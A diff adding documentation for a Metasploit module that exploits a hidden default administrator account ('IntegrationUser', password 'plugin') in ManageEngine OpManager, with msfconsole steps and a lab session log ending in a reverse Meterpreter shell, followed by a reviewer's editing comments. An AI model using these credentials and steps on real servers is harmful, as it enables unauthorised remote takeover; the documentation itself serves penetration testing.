|
| 1 | +## Description |
| 2 | + |
| 3 | +This module exploits a default credential vulnerability in ManageEngine OpManager, where a |
| 4 | +default hidden account "IntegrationUser" with administrator privileges exists. The account |
| 5 | +has a default password of "plugin" which can not be reset through the user interface. By |
| 6 | +log-in and abusing the default administrator's SQL query functionality, it's possible to |
| 7 | +write a WAR payload to disk and trigger an automatic deployment of this payload. |
| 8 | + |
| 9 | +## Vulnerable Application |
| 10 | + |
| 11 | +[OpManager](https://www.manageengine.com/network-monitoring/) is an application designed |
| 12 | +around "integrated network management". |
| 13 | + |
| 14 | +This module has been verified against the following OpManager versions: |
| 15 | + |
| 16 | +* v11.0 |
| 17 | +* v11.4 |
| 18 | +* v11.5 |
| 19 | +* v11.6 |
| 20 | + |
| 21 | +Installers: |
| 22 | + |
| 23 | +* [OpManager Installers](http://archives.manageengine.com/opmanager/) |
| 24 | + |
| 25 | +## Verification Steps |
| 26 | + |
| 27 | +1. Start msfconsole |
| 28 | +1. `use exploit/windows/http/manage_engine_opmanager_rce` |
| 29 | +1. `set RHOST <IP addr of target system running OpManager>` |
| 30 | +1. `exploit` |
| 31 | +1. You should get a working Meterpreter session |
| 32 | + |
| 33 | +## Scenarios |
| 34 | + |
| 35 | +### Targeting Windows Server 2012 running OpManager v11.5 |
| 36 | + |
| 37 | +``` |
| 38 | +msf > use exploit/windows/http/manage_engine_opmanager_rce |
| 39 | +msf exploit(manage_engine_opmanager_rce) > set RHOST 10.0.2.12 |
| 40 | +RHOST => 10.0.2.12 |
| 41 | +msf exploit(manage_engine_opmanager_rce) > exploit |
| 42 | +
|
| 43 | +[*] Started reverse TCP handler on 10.0.2.4:4444 |
| 44 | +[*] Access login page |
| 45 | +[*] Location is [ http://10.0.2.12/apiclient/ember/index.jsp;jsessionid=B5903DA9A1DBA5592690EC69AF7FA27D ] |
| 46 | +[*] Following redirection |
| 47 | +[*] Retrieved API key [ 2eb58a9f104f29c8520d23243502cf5b ] |
| 48 | +[*] Executing SQL queries |
| 49 | +[*] Attempting to launch payload in deployed WAR... |
| 50 | +[*] Attempting to launch payload in deployed WAR... |
| 51 | +[*] Attempting to launch payload in deployed WAR... |
| 52 | +[*] Sending stage (49667 bytes) to 10.0.2.12 |
| 53 | +[*] Meterpreter session 1 opened (10.0.2.4:4444 -> 10.0.2.12:49496) at 2017-06-20 15:13:50 -0500 |
| 54 | +[+] Deleted tomcat//webapps//r63xuE3q1gOAZsCQuJ.war |
| 55 | +[!] This exploit may require manual cleanup of 'tomcat//webapps//r63xuE3q1gOAZsCQuJ' on the target |
| 56 | +
|
| 57 | +meterpreter > getuid |
| 58 | +Server username: Administrator |
| 59 | +meterpreter > sysinfo |
| 60 | +Computer : WIN-SI597APFOFH |
| 61 | +OS : Windows Server 2008 6.2 (amd64) |
| 62 | +Meterpreter : java/windows |
| 63 | +``` |
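Review bot: the Scenarios heading says "Targeting Windows Server 2012 running OpManager v11.5", but the `sysinfo` output in the same block reports `OS : Windows Server 2008 6.2 (amd64)`; reconcile the two (correct the heading, or add one sentence explaining why the reported OS string differs) so the session log does not look like it was pasted from a different run. In the Description, "which can not be reset" should read "which cannot be reset", and "By log-in and abusing" should read "By logging in and abusing". The Verification Steps never set a payload or `LHOST`, yet the scenario shows a reverse TCP handler on 10.0.2.4:4444; add a `set LHOST <attacker IP>` step (and the payload if the default is not intended) so the walkthrough is reproducible as written. Lastly, the output ends with "[!] This exploit may require manual cleanup of 'tomcat//webapps//r63xuE3q1gOAZsCQuJ' on the target", so a short note in Scenarios that the exploded WAR directory under the Tomcat webapps folder is left behind and must be removed manually would save operators a surprise.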